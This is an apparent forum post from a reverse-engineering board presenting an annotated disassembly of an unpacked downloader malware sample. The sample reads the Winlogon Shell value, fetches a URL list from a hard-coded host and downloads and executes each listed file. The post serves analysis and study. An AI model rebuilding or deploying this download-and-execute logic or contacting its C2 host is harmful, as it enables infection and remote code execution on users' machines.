[讨论]发个高质量下载样本一个
脱个壳看没什么东西，都很直观。不多说了，谢谢作者给个学习的机会。
;-----------------------------------------------------------------------
; sub_401000 -- BOOL __stdcall RunCommand(LPSTR cmdline)
; ABI:    stdcall (retn 4), 32-bit x86, ebp frame
; In:     [ebp+8]  = cmdline, passed as lpCommandLine to CreateProcessA
; Locals: [ebp-44] = STARTUPINFOA  (0x44 bytes), filled by GetStartupInfoA
;         [ebp-54] = PROCESS_INFORMATION (0x10 bytes; hProcess at -54, hThread at -50)
; Out:    eax = CreateProcessA result on the success path; on the failure
;         path eax is whatever the last CloseHandle returned.
; NOTE(review): the clean-up below runs only when CreateProcessA FAILS
; (the jnz at 0040102F skips it on success), so hProcess/hThread leak on
; every successful launch and CloseHandle is applied to never-initialised
; slots on failure. Recorded as an observation of the sample, not a fix.
;-----------------------------------------------------------------------
00401000 55 push ebp
00401001 8BEC mov ebp,esp
00401003 83C4 AC add esp,-54 ; frame = 0x54 bytes (PI + SI)
00401006 8D45 BC lea eax,dword ptr ss:[ebp-44] ; &si
00401009 50 push eax
0040100A E8 17040000 call du_1.00401426 ; jmp to kernel32.GetStartupInfoA -- GetStartupInfoA(&si): copies this process' own STARTUPINFO as the child's
0040100F 8D45 AC lea eax,dword ptr ss:[ebp-54] ; &pi
00401012 50 push eax
00401013 8D45 BC lea eax,dword ptr ss:[ebp-44] ; &si
00401016 50 push eax
00401017 6A 00 push 0 ; lpCurrentDirectory = NULL
00401019 6A 00 push 0 ; lpEnvironment = NULL
0040101B 6A 20 push 20 ; dwCreationFlags = 0x20 (NORMAL_PRIORITY_CLASS)
0040101D 6A 00 push 0 ; bInheritHandles = FALSE
0040101F 6A 00 push 0 ; lpThreadAttributes = NULL
00401021 6A 00 push 0 ; lpProcessAttributes = NULL
00401023 FF75 08 push dword ptr ss:[ebp+8] ; lpCommandLine = cmdline
00401026 6A 00 push 0 ; lpApplicationName = NULL -> cmdline is parsed by CreateProcess
00401028 E8 DB030000 call du_1.00401408 ; jmp to kernel32.CreateProcessA
0040102D 0BC0 or eax,eax
0040102F 75 10 jnz short du_1.00401041 ; success -> return WITHOUT closing the two handles (see header)
00401031 FF75 B0 push dword ptr ss:[ebp-50] ; pi.hThread (not valid on this path)
00401034 E8 BD030000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
00401039 FF75 AC push dword ptr ss:[ebp-54] ; pi.hProcess (not valid on this path)
0040103C E8 B5030000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
00401041 C9 leave
00401042 C2 0400 retn 4
;-----------------------------------------------------------------------
; sub_401045 -- int __stdcall DownloadToFile(LPCSTR url, LPCSTR outPath, DWORD timeoutMs)
; ABI:    stdcall (retn 0C), 32-bit x86, ebp frame
; In:     [ebp+8]  = url      -> lpszUrl of InternetOpenUrlA
;         [ebp+C]  = outPath  -> lpFileName of CreateFileA
;         [ebp+10] = timeout value handed to InternetSetOptionA twice
;                    (4-byte buffer; both callers pass 0x1388 = 5000 ms)
; Locals: [ebp-4]   = hInternet  (InternetOpenA)
;         [ebp-8]   = hUrl       (InternetOpenUrlA)
;         [ebp-C]   = hFile      (CreateFileA)
;         [ebp-10]  = DWORD: buffer length for HttpQueryInfoA (0x200),
;                     later reused as WriteFile's bytes-written out-param
;         [ebp-14]  = DWORD: HttpQueryInfoA index, later bytes read per chunk
;         [ebp-18]  = number of non-empty chunks written (the return value)
;         [ebp-218] = 0x200-byte scratch buffer (status text, then file data)
; Out:    eax = [ebp-18]; 0 when nothing was written. Callers only test for
;         zero, so the count itself is not relied upon.
; Clobb:  eax, flags (callee-saved regs are not touched)
; Network artefact: the User-Agent sent is the literal "Shell" (same string
; later used as the registry value name at 00401260).
;-----------------------------------------------------------------------
00401045 55 push ebp
00401046 8BEC mov ebp,esp
00401048 81C4 E8FDFFFF add esp,-218 ; locals + 0x200 buffer
0040104E 33C0 xor eax,eax
00401050 8945 E8 mov dword ptr ss:[ebp-18],eax ; chunks_written = 0
00401053 6A 00 push 0 ; dwFlags = 0
00401055 6A 00 push 0 ; lpszProxyBypass = NULL
00401057 6A 00 push 0 ; lpszProxy = NULL
00401059 6A 00 push 0 ; dwAccessType = 0 (INTERNET_OPEN_TYPE_PRECONFIG)
0040105B 68 06304000 push du_1.00403006 ; ASCII "Shell" -- lpszAgent: becomes the HTTP User-Agent header
00401060 E8 21040000 call du_1.00401486 ; jmp to wininet.InternetOpenA
00401065 0BC0 or eax,eax
00401067 0F84 F1000000 je du_1.0040115E ; no session -> return 0
0040106D 8945 FC mov dword ptr ss:[ebp-4],eax ; hInternet
00401070 6A 04 push 4 ; dwBufferLength = sizeof(DWORD)
00401072 FF75 10 push dword ptr ss:[ebp+10] ; lpBuffer = timeout value (passed by value, used as a pointer -- see NOTE below)
00401075 6A 02 push 2 ; dwOption = 2 (INTERNET_OPTION_CONNECT_TIMEOUT)
00401077 FF75 FC push dword ptr ss:[ebp-4] ; hInternet
0040107A E8 19040000 call du_1.00401498 ; jmp to wininet.InternetSetOptionA
; NOTE(review): InternetSetOptionA expects lpBuffer to POINT at the DWORD; the
; raw value 0x1388 is pushed instead, so both calls presumably fail and the
; default timeouts stay in force. Return values are not checked either way.
0040107F 6A 04 push 4 ; dwBufferLength = 4
00401081 FF75 10 push dword ptr ss:[ebp+10] ; same (mis-passed) value
00401084 6A 06 push 6 ; dwOption = 6 (INTERNET_OPTION_RECEIVE_TIMEOUT)
00401086 FF75 FC push dword ptr ss:[ebp-4] ; hInternet
00401089 E8 0A040000 call du_1.00401498 ; jmp to wininet.InternetSetOptionA
0040108E 6A 00 push 0 ; dwContext = 0
00401090 68 00000020 push 20000000 ; dwFlags = 0x20000000 (INTERNET_FLAG_EXISTING_CONNECT)
00401095 6A 00 push 0 ; dwHeadersLength = 0
00401097 6A 00 push 0 ; lpszHeaders = NULL
00401099 FF75 08 push dword ptr ss:[ebp+8] ; lpszUrl = url
0040109C FF75 FC push dword ptr ss:[ebp-4] ; hInternet
0040109F E8 E8030000 call du_1.0040148C ; jmp to wininet.InternetOpenUrlA
004010A4 0BC0 or eax,eax
004010A6 0F84 AA000000 je du_1.00401156 ; open failed -> close session, return 0
004010AC 8945 F8 mov dword ptr ss:[ebp-8],eax ; hUrl
004010AF C745 EC 00000000 mov dword ptr ss:[ebp-14],0 ; lpdwIndex = 0
004010B6 C745 F0 00020000 mov dword ptr ss:[ebp-10],200 ; lpdwBufferLength = 0x200
004010BD FF75 EC push dword ptr ss:[ebp-14] ; lpdwIndex passed by value (0), not by address
004010C0 8D45 F0 lea eax,dword ptr ss:[ebp-10]
004010C3 50 push eax ; &bufferLength
004010C4 8D85 E8FDFFFF lea eax,dword ptr ss:[ebp-218]
004010CA 50 push eax ; lpBuffer = scratch
004010CB 6A 13 push 13 ; dwInfoLevel = 0x13 (HTTP_QUERY_STATUS_CODE)
004010CD FF75 F8 push dword ptr ss:[ebp-8] ; hUrl
004010D0 E8 9F030000 call du_1.00401474 ; jmp to wininet.HttpQueryInfoA -- status text lands in scratch but is never compared; only the API's success is tested
004010D5 0BC0 or eax,eax
004010D7 74 75 je short du_1.0040114E ; query failed -> close hUrl and session
004010D9 6A 00 push 0 ; hTemplateFile = NULL
004010DB 6A 00 push 0 ; dwFlagsAndAttributes = 0
004010DD 6A 04 push 4 ; dwCreationDisposition = 4 (OPEN_ALWAYS)
004010DF 6A 00 push 0 ; lpSecurityAttributes = NULL
004010E1 6A 00 push 0 ; dwShareMode = 0
004010E3 68 00000040 push 40000000 ; dwDesiredAccess = GENERIC_WRITE
004010E8 FF75 0C push dword ptr ss:[ebp+C] ; lpFileName = outPath
004010EB E8 0C030000 call du_1.004013FC ; jmp to kernel32.CreateFileA
004010F0 83F8 FF cmp eax,-1 ; INVALID_HANDLE_VALUE?
004010F3 74 59 je short du_1.0040114E
004010F5 8945 F4 mov dword ptr ss:[ebp-C],eax ; hFile
; --- read/write loop: 0x200-byte chunks until InternetReadFile fails or returns 0 bytes ---
004010F8 C745 EC 00000000 mov dword ptr ss:[ebp-14],0 ; bytesRead = 0
004010FF 8D45 EC lea eax,dword ptr ss:[ebp-14]
00401102 50 push eax ; lpdwNumberOfBytesRead
00401103 68 00020000 push 200 ; dwNumberOfBytesToRead = 0x200
00401108 8D85 E8FDFFFF lea eax,dword ptr ss:[ebp-218]
0040110E 50 push eax ; lpBuffer = scratch
0040110F FF75 F8 push dword ptr ss:[ebp-8] ; hUrl
00401112 E8 7B030000 call du_1.00401492 ; jmp to wininet.InternetReadFile
00401117 0BC0 or eax,eax
00401119 74 23 je short du_1.0040113E ; read error -> finish file
0040111B 837D EC 00 cmp dword ptr ss:[ebp-14],0
0040111F 74 1D je short du_1.0040113E ; 0 bytes = end of stream
00401121 FF45 E8 inc dword ptr ss:[ebp-18] ; chunks_written++
00401124 6A 00 push 0 ; lpOverlapped = NULL
00401126 8D45 F0 lea eax,dword ptr ss:[ebp-10]
00401129 50 push eax ; lpNumberOfBytesWritten (reuses the old length slot)
0040112A FF75 EC push dword ptr ss:[ebp-14] ; nNumberOfBytesToWrite = bytesRead
0040112D 8D85 E8FDFFFF lea eax,dword ptr ss:[ebp-218]
00401133 50 push eax ; lpBuffer = scratch
00401134 FF75 F4 push dword ptr ss:[ebp-C] ; hFile
00401137 E8 1A030000 call du_1.00401456 ; jmp to kernel32.WriteFile -- result not checked; a short/failed write still counts
0040113C ^ EB BA jmp short du_1.004010F8
0040113E FF75 F4 push dword ptr ss:[ebp-C]
00401141 E8 FE020000 call du_1.00401444 ; jmp to kernel32.SetEndOfFile -- truncates any longer content left from an earlier OPEN_ALWAYS
00401146 FF75 F4 push dword ptr ss:[ebp-C]
00401149 E8 A8020000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
0040114E FF75 F8 push dword ptr ss:[ebp-8]
00401151 E8 24030000 call du_1.0040147A ; jmp to wininet.InternetCloseHandle -- hUrl
00401156 FF75 FC push dword ptr ss:[ebp-4]
00401159 E8 1C030000 call du_1.0040147A ; jmp to wininet.InternetCloseHandle -- hInternet
0040115E 8B45 E8 mov eax,dword ptr ss:[ebp-18] ; return chunks_written
00401161 C9 leave
00401162 C2 0C00 retn 0C
;-----------------------------------------------------------------------
; sub_401165 -- DWORD WINAPI FetchAndRunThread(LPSTR url)
; ABI:    stdcall (retn 4); used as lpStartAddress of CreateThread at 0040138D
; In:     [ebp+8] = url, copied immediately into a local because the
;                   creating thread reuses its line buffer for the next URL
; Locals: [ebp-4]   = retry counter, starts at 0x3C (60 attempts)
;         [ebp-104] = 0x100-byte temp path returned by GetTempFileNameA
;         [ebp-204] = 0x100-byte private copy of url (lstrcpyA, no bound)
; Side effects: decrements the global thread counter ds:[403000] on exit;
;         the entry point spins on that counter before ExitProcess.
; Out:    eax = whatever the last call left (not used by the caller)
; Behaviour: download url to a temp file (5 s timeout), then launch the
; temp file via sub_401000; on failure sleep 1 s and retry up to 60 times.
;-----------------------------------------------------------------------
00401165 55 push ebp
00401166 8BEC mov ebp,esp
00401168 81C4 FCFDFFFF add esp,-204
0040116E C745 FC 3C000000 mov dword ptr ss:[ebp-4],3C ; retries = 60
00401175 FF75 08 push dword ptr ss:[ebp+8] ; lpString2 = url
00401178 8D85 FCFDFFFF lea eax,dword ptr ss:[ebp-204]
0040117E 50 push eax ; lpString1 = local copy
0040117F E8 D8020000 call du_1.0040145C ; jmp to kernel32.lstrcpyA -- unbounded copy into a 0x100-byte local
00401184 68 00010000 push 100 ; Length = 0x100
00401189 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
0040118F 50 push eax
00401190 E8 A9020000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory -- clear temp-path buffer
00401195 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
0040119B 50 push eax ; lpTempFileName = temp-path buffer
0040119C 6A 00 push 0 ; uUnique = 0 -> system picks the name (and creates the file)
0040119E 6A 00 push 0 ; lpPrefixString = NULL
004011A0 68 04304000 push du_1.00403004 ; lpPathName = string at 00403004 (contents not shown in this listing)
004011A5 E8 82020000 call du_1.0040142C ; jmp to kernel32.GetTempFileNameA
; --- retry loop ---
004011AA 68 88130000 push 1388 ; timeoutMs = 0x1388 = 5000
004011AF 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
004011B5 50 push eax ; outPath = temp file
004011B6 8D85 FCFDFFFF lea eax,dword ptr ss:[ebp-204]
004011BC 50 push eax ; url (local copy)
004011BD E8 83FEFFFF call du_1.00401045 ; DownloadToFile(url, tempPath, 5000)
004011C2 0BC0 or eax,eax
004011C4 74 10 je short du_1.004011D6 ; nothing written -> sleep and retry
004011C6 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
004011CC 50 push eax ; cmdline = temp file path
004011CD E8 2EFEFFFF call du_1.00401000 ; RunCommand(tempPath): execute the payload
004011D2 EB 15 jmp short du_1.004011E9 ; done, fall out of the loop
004011D4 EB 0D jmp short du_1.004011E3 ; unreachable (preceded by an unconditional jmp)
004011D6 68 E8030000 push 3E8 ; dwMilliseconds = 1000
004011DB E8 6A020000 call du_1.0040144A ; jmp to kernel32.Sleep
004011E0 FF4D FC dec dword ptr ss:[ebp-4] ; retries--
004011E3 837D FC 00 cmp dword ptr ss:[ebp-4],0
004011E7 ^ 75 C1 jnz short du_1.004011AA ; retry until the counter hits zero
004011E9 FF0D 00304000 dec dword ptr ds:[403000] ; active-thread counter-- (plain dec, no interlock)
004011EF C9 leave
004011F0 C2 0400 retn 4
///////////// 入口 (entry point, 004011F3)
;-----------------------------------------------------------------------
; entry (004011F3) -- program entry point of the downloader
; ABI:    32-bit x86, ebp frame; never returns (ExitProcess at 004013F1)
; Locals: [ebp-4]   = HKEY for HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
;         [ebp-8]   = DWORD scratch: cbData for RegQueryValueExA (0x104),
;                     then lpdwFlags for InternetGetConnectedState,
;                     then lpThreadId for CreateThread
;         [ebp-C]   = hFile of the downloaded list file
;         [ebp-10]  = hMapping (CreateFileMappingA)
;         [ebp-14]  = mapped view base (MapViewOfFile)
;         [ebp-118] = 0x104-byte buffer, reused for: Winlogon "Shell" value,
;                     temp-file path, then the current line of the list
; Globals: ds:[403000] = count of worker threads still running
; Behaviour, as far as the listing shows:
;   1. LoadLibraryA("user32.dll") and call its export "LoadRemoteFonts"
;      (purpose not evident from the listing).
;   2. Read Winlogon\Shell and execute it via sub_401000 -- presumably the
;      sample is installed as the Winlogon Shell and this launches the real
;      shell first; the listing itself does not show who writes that value.
;   3. Wait for InternetGetConnectedState, then download
;      http://nimabi.be.ma/b/a/m.txt into a temp file, retrying forever.
;   4. Map the file, split it on CR into lines, spawn sub_401165 per
;      non-empty line (download-and-execute), then wait for all workers
;      and ExitProcess.
; Forensic notes (from the imports): there is no DeleteFile thunk, so the
; list file and each payload temp file are left on disk; the User-Agent is
; "Shell"; the reused local buffer at [ebp-118] is the only line storage.
;-----------------------------------------------------------------------
004011F3 55 push ebp
004011F4 8BEC mov ebp,esp
004011F6 81C4 E8FEFFFF add esp,-118
004011FC 68 0C304000 push du_1.0040300C ; ASCII "user32.dll"
00401201 E8 2C020000 call du_1.00401432 ; jmp to kernel32.LoadLibraryA
00401206 0BC0 or eax,eax
00401208 74 11 je short du_1.0040121B ; load failed -> skip the call
0040120A 68 17304000 push du_1.00403017 ; ASCII "LoadRemoteFonts"
0040120F 50 push eax ; hModule = user32
00401210 E8 0B020000 call du_1.00401420 ; jmp to kernel32.GetProcAddress
00401215 0BC0 or eax,eax
00401217 74 02 je short du_1.0040121B ; export missing -> skip
00401219 FFD0 call eax ; user32!LoadRemoteFonts(), no arguments pushed
; --- step 2: execute the current Winlogon Shell value ---
0040121B 8D45 FC lea eax,dword ptr ss:[ebp-4]
0040121E 50 push eax ; phkResult
0040121F 68 19000200 push 20019 ; samDesired = 0x20019 (KEY_READ)
00401224 6A 00 push 0 ; ulOptions = 0
00401226 68 27304000 push du_1.00403027 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
0040122B 68 02000080 push 80000002 ; hKey = HKEY_LOCAL_MACHINE
00401230 E8 33020000 call du_1.00401468 ; jmp to ADVAPI32.RegOpenKeyExA
00401235 0BC0 or eax,eax
00401237 75 48 jnz short du_1.00401281 ; ERROR_SUCCESS is 0; any error skips the whole block
00401239 C745 F8 04010000 mov dword ptr ss:[ebp-8],104 ; cbData = 0x104 (MAX_PATH)
00401240 68 04010000 push 104
00401245 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
0040124B 50 push eax
0040124C E8 ED010000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory -- clear value buffer
00401251 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00401254 50 push eax ; lpcbData
00401255 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
0040125B 50 push eax ; lpData
0040125C 6A 00 push 0 ; lpType = NULL
0040125E 6A 00 push 0 ; lpReserved = NULL
00401260 68 06304000 push du_1.00403006 ; ASCII "Shell" -- lpValueName
00401265 FF75 FC push dword ptr ss:[ebp-4] ; hKey
00401268 E8 01020000 call du_1.0040146E ; jmp to ADVAPI32.RegQueryValueExA -- result not checked; buffer may still be all zeros
0040126D 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
00401273 50 push eax
00401274 E8 87FDFFFF call du_1.00401000 ; RunCommand(shellValue)
00401279 FF75 FC push dword ptr ss:[ebp-4]
0040127C E8 E1010000 call du_1.00401462 ; jmp to ADVAPI32.RegCloseKey
; --- step 3: wait for connectivity, then fetch the URL list ---
00401281 68 E8030000 push 3E8
00401286 E8 BF010000 call du_1.0040144A ; jmp to kernel32.Sleep -- 1000 ms
0040128B 6A 00 push 0 ; dwReserved = 0
0040128D 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00401290 50 push eax ; lpdwFlags (value unused)
00401291 E8 EA010000 call du_1.00401480 ; jmp to wininet.InternetGetConnectedState
00401296 0BC0 or eax,eax
00401298 75 02 jnz short du_1.0040129C ; connected -> continue
0040129A ^ EB EF jmp short du_1.0040128B ; busy-poll with no sleep until connected
0040129C 68 04010000 push 104
004012A1 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
004012A7 50 push eax
004012A8 E8 91010000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory -- clear path buffer
004012AD 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
004012B3 50 push eax ; lpTempFileName
004012B4 6A 00 push 0 ; uUnique = 0
004012B6 6A 00 push 0 ; lpPrefixString = NULL
004012B8 68 04304000 push du_1.00403004 ; lpPathName = string at 00403004 (not shown)
004012BD E8 6A010000 call du_1.0040142C ; jmp to kernel32.GetTempFileNameA
; --- download loop: repeats until DownloadToFile returns non-zero ---
004012C2 68 E8030000 push 3E8
004012C7 E8 7E010000 call du_1.0040144A ; jmp to kernel32.Sleep -- 1000 ms
004012CC 68 88130000 push 1388 ; timeoutMs = 5000
004012D1 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
004012D7 50 push eax ; outPath = temp file
004012D8 68 5D304000 push du_1.0040305D ; ASCII "http://nimabi.be.ma/b/a/m.txt" -- hard-coded C2 list URL
004012DD E8 63FDFFFF call du_1.00401045 ; DownloadToFile(url, tempPath, 5000)
004012E2 0BC0 or eax,eax
004012E4 75 02 jnz short du_1.004012E8
004012E6 ^ EB E4 jmp short du_1.004012CC ; failed -> retry immediately (the Sleep above is outside the loop)
; --- step 4: open and map the list file ---
004012E8 6A 00 push 0 ; hTemplateFile = NULL
004012EA 6A 00 push 0 ; dwFlagsAndAttributes = 0
004012EC 6A 03 push 3 ; dwCreationDisposition = 3 (OPEN_EXISTING)
004012EE 6A 00 push 0 ; lpSecurityAttributes = NULL
004012F0 6A 00 push 0 ; dwShareMode = 0
004012F2 68 00000080 push 80000000 ; dwDesiredAccess = GENERIC_READ
004012F7 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
004012FD 50 push eax ; lpFileName = temp path
004012FE E8 F9000000 call du_1.004013FC ; jmp to kernel32.CreateFileA
00401303 83F8 FF cmp eax,-1
00401306 0F84 CC000000 je du_1.004013D8 ; INVALID_HANDLE_VALUE -> re-download
0040130C 8945 F4 mov dword ptr ss:[ebp-C],eax ; hFile
0040130F 6A 00 push 0 ; lpFileSizeHigh = NULL
00401311 FF75 F4 push dword ptr ss:[ebp-C]
00401314 E8 01010000 call du_1.0040141A ; jmp to kernel32.GetFileSize
00401319 83F8 0F cmp eax,0F
0040131C 0F82 9F000000 jb du_1.004013C1 ; under 15 bytes (or 0xFFFFFFFF on error is NOT caught) -> close and re-download
00401322 6A 00 push 0 ; lpName = NULL
00401324 6A 00 push 0 ; dwMaximumSizeLow = 0 (whole file)
00401326 6A 00 push 0 ; dwMaximumSizeHigh = 0
00401328 6A 02 push 2 ; flProtect = 2 (PAGE_READONLY)
0040132A 6A 00 push 0 ; lpAttributes = NULL
0040132C FF75 F4 push dword ptr ss:[ebp-C] ; hFile
0040132F E8 CE000000 call du_1.00401402 ; jmp to kernel32.CreateFileMappingA
00401334 0BC0 or eax,eax
00401336 0F84 92000000 je du_1.004013CE ; mapping failed -> close file, then exit path
0040133C 8945 F0 mov dword ptr ss:[ebp-10],eax ; hMapping
0040133F 6A 00 push 0 ; dwNumberOfBytesToMap = 0 (entire mapping)
00401341 6A 00 push 0 ; dwFileOffsetLow = 0
00401343 6A 00 push 0 ; dwFileOffsetHigh = 0
00401345 6A 04 push 4 ; dwDesiredAccess = 4 (FILE_MAP_READ)
00401347 50 push eax ; hMapping
00401348 E8 EB000000 call du_1.00401438 ; jmp to kernel32.MapViewOfFile
0040134D 0BC0 or eax,eax
0040134F 74 66 je short du_1.004013B7 ; map failed -> close mapping
00401351 8945 EC mov dword ptr ss:[ebp-14],eax ; view base (for UnmapViewOfFile)
00401354 8BF0 mov esi,eax ; esi = read cursor into the mapped file
; --- line splitter: esi = cursor, edi = write position in [ebp-118] ---
; Invariants: one line per CR (0x0D); an LF directly after any byte is
; skipped; a NUL byte ends the whole scan. The line buffer is the same
; 0x104-byte local that held the temp path, so that path is lost here.
00401356 8DBD E8FEFFFF lea edi,dword ptr ss:[ebp-118] ; start a fresh line
0040135C 68 04010000 push 104
00401361 57 push edi
00401362 E8 D7000000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory -- clear line buffer
00401367 AC lods byte ptr ds:[esi] ; al = *esi++ (no check against file size; relies on a NUL to stop)
00401368 3C 0A cmp al,0A
0040136A 75 01 jnz short du_1.0040136D
0040136C AC lods byte ptr ds:[esi] ; LF seen: drop it and take the next byte instead
0040136D 3C 0D cmp al,0D
0040136F 75 39 jnz short du_1.004013AA ; not CR -> append to line
00401371 80BD E8FEFFFF 00 cmp byte ptr ss:[ebp-118],0
00401378 74 2E je short du_1.004013A8 ; CR on an empty line -> restart the line
0040137A FF05 00304000 inc dword ptr ds:[403000] ; threads++ BEFORE CreateThread; never undone if CreateThread fails
00401380 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00401383 50 push eax ; lpThreadId
00401384 6A 00 push 0 ; dwCreationFlags = 0 (run immediately)
00401386 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
0040138C 50 push eax ; lpParameter = the line buffer itself (not a copy)
0040138D 68 65114000 push du_1.00401165 ; lpStartAddress = FetchAndRunThread
00401392 6A 00 push 0 ; dwStackSize = 0
00401394 6A 00 push 0 ; lpThreadAttributes = NULL
00401396 E8 73000000 call du_1.0040140E ; jmp to kernel32.CreateThread -- return value not tested
0040139B 50 push eax
0040139C E8 55000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle -- thread handle dropped; completion tracked via [403000]
004013A1 6A 64 push 64
004013A3 E8 A2000000 call du_1.0040144A ; jmp to kernel32.Sleep -- 100 ms: the only thing separating the worker's lstrcpyA from the re-zero at 00401356
004013A8 ^ EB AC jmp short du_1.00401356
004013AA AA stos byte ptr es:[edi] ; *edi++ = al; no bound against the 0x104-byte buffer, so an over-long line overruns this frame's locals
004013AB 0AC0 or al,al
004013AD ^ 75 B8 jnz short du_1.00401367 ; keep scanning until a NUL
; NUL reached: a trailing line with no CR is stored but never dispatched.
004013AF FF75 EC push dword ptr ss:[ebp-14]
004013B2 E8 99000000 call du_1.00401450 ; jmp to kernel32.UnmapViewOfFile
004013B7 FF75 F0 push dword ptr ss:[ebp-10]
004013BA E8 37000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle -- hMapping
004013BF EB 0D jmp short du_1.004013CE
004013C1 FF75 F4 push dword ptr ss:[ebp-C]
004013C4 E8 2D000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle -- hFile (too-small file)
004013C9 ^ E9 FEFEFFFF jmp du_1.004012CC ; re-download the list
004013CE FF75 F4 push dword ptr ss:[ebp-C]
004013D1 E8 20000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle -- hFile
004013D6 EB 05 jmp short du_1.004013DD
004013D8 ^ E9 EFFEFFFF jmp du_1.004012CC ; CreateFileA failed -> re-download
004013DD EB 07 jmp short du_1.004013E6
; --- wait for all workers, then exit ---
004013DF 6A 64 push 64
004013E1 E8 64000000 call du_1.0040144A ; jmp to kernel32.Sleep -- 100 ms between polls
004013E6 833D 00304000 00 cmp dword ptr ds:[403000],0
004013ED ^ 75 F0 jnz short du_1.004013DF ; spins forever if a counter increment was never paired with a decrement
004013EF 6A 00 push 0 ; uExitCode = 0
004013F1 E8 1E000000 call du_1.00401414 ; jmp to kernel32.ExitProcess
004013F1 E8 1E000000 call du_1.00401414 ; jmp to kernel32.ExitProcess -- duplicate listing line of the instruction above (same address)
;-----------------------------------------------------------------------
; Import thunks (004013F6..00401498): each entry is `jmp dword ptr [IAT slot]`
; with the IAT at 00402000..00402074. Every `call du_1.004013xx/004014xx`
; in the functions above resolves through one of these.
; The import set itself is a compact static signature for this sample:
; wininet (open URL / read / query / connectivity), kernel32 file + mapping
; + CreateProcessA/CreateThread, ADVAPI32 registry read, ntdll RtlZeroMemory.
; Notably absent: DeleteFileA, RegSetValueExA, any crypto or socket API --
; downloaded files are not removed and persistence is not written here.
;-----------------------------------------------------------------------
004013F6 - FF25 54204000 jmp dword ptr ds:[402054] ; kernel32.CloseHandle
004013FC - FF25 4C204000 jmp dword ptr ds:[40204C] ; kernel32.CreateFileA
00401402 - FF25 48204000 jmp dword ptr ds:[402048] ; kernel32.CreateFileMappingA
00401408 - FF25 2C204000 jmp dword ptr ds:[40202C] ; kernel32.CreateProcessA
0040140E - FF25 10204000 jmp dword ptr ds:[402010] ; kernel32.CreateThread
00401414 - FF25 14204000 jmp dword ptr ds:[402014] ; kernel32.ExitProcess
0040141A - FF25 18204000 jmp dword ptr ds:[402018] ; kernel32.GetFileSize
00401420 - FF25 1C204000 jmp dword ptr ds:[40201C] ; kernel32.GetProcAddress
00401426 - FF25 20204000 jmp dword ptr ds:[402020] ; kernel32.GetStartupInfoA
0040142C - FF25 24204000 jmp dword ptr ds:[402024] ; kernel32.GetTempFileNameA
00401432 - FF25 28204000 jmp dword ptr ds:[402028] ; kernel32.LoadLibraryA
00401438 - FF25 50204000 jmp dword ptr ds:[402050] ; kernel32.MapViewOfFile
0040143E - FF25 30204000 jmp dword ptr ds:[402030] ; ntdll.RtlZeroMemory
00401444 - FF25 34204000 jmp dword ptr ds:[402034] ; kernel32.SetEndOfFile
0040144A - FF25 38204000 jmp dword ptr ds:[402038] ; kernel32.Sleep
00401450 - FF25 3C204000 jmp dword ptr ds:[40203C] ; kernel32.UnmapViewOfFile
00401456 - FF25 40204000 jmp dword ptr ds:[402040] ; kernel32.WriteFile
0040145C - FF25 44204000 jmp dword ptr ds:[402044] ; kernel32.lstrcpyA
00401462 - FF25 04204000 jmp dword ptr ds:[402004] ; ADVAPI32.RegCloseKey
00401468 - FF25 00204000 jmp dword ptr ds:[402000] ; ADVAPI32.RegOpenKeyExA
0040146E - FF25 08204000 jmp dword ptr ds:[402008] ; ADVAPI32.RegQueryValueExA
00401474 - FF25 74204000 jmp dword ptr ds:[402074] ; wininet.HttpQueryInfoA
0040147A - FF25 5C204000 jmp dword ptr ds:[40205C] ; wininet.InternetCloseHandle
00401480 - FF25 60204000 jmp dword ptr ds:[402060] ; wininet.InternetGetConnectedState
00401486 - FF25 64204000 jmp dword ptr ds:[402064] ; wininet.InternetOpenA
0040148C - FF25 68204000 jmp dword ptr ds:[402068] ; wininet.InternetOpenUrlA
00401492 - FF25 6C204000 jmp dword ptr ds:[40206C] ; wininet.InternetReadFile
00401498 - FF25 70204000 jmp dword ptr ds:[402070] ; wininet.InternetSetOptionA